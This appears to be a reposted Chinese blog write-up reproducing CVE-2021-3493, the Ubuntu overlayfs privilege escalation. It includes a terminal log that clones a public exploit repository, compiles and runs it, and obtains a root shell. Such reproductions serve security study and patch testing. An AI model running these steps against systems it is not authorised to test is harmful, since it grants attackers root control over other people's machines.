CVE-2021-3493漏洞復現

本文轉載自查看原文 2021-04-28 23:52 380 滲透測試

漏洞簡介

Linux 內核中 overlayfs 文件系統是 Ubuntu 的特定問題，由於沒有正確的驗證文件系統功能在用戶名稱空間中的應用，從而導致攻擊者可以安裝一個允許未授權掛載的 overlayfs 修補程序來提升權限

影響版本

ubuntu 20.04

ubuntu 16.04

ubuntu18.04

ubuntu 14.04

本次復現為ubuntu20.04版本

漏洞復現

test@linux:~# git clone https://github.com/ASkyeye/CVE-2021-3493.git
test@linux:~$ cd CVE-2021-3493/
test@linux:~/CVE-2021-3493$ gcc exploit.c -o exploit
test@linux:~/CVE-2021-3493$ chmod u+x exploit
test@linux:~/CVE-2021-3493$ ./exploit
bash-5.0$ whoami
root

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CVE-2021-1675漏洞復現 Exchange CVE-2021-26855&CVE-2021-27065 漏洞復現 CVE-2021-3156漏洞復現 CVE-2021-3156漏洞復現 CVE-2021-1675漏洞復現 CVE-2021-21975漏洞復現 Linux sudo權限提升漏洞（CVE-2021-3156）復現 [權限提升] CVE-2021-3156 Linux sudo 漏洞復現 CVE-2021-22205 Gitlab遠程命令執行漏洞復現 CVE-2021-3156 sudo提權漏洞復現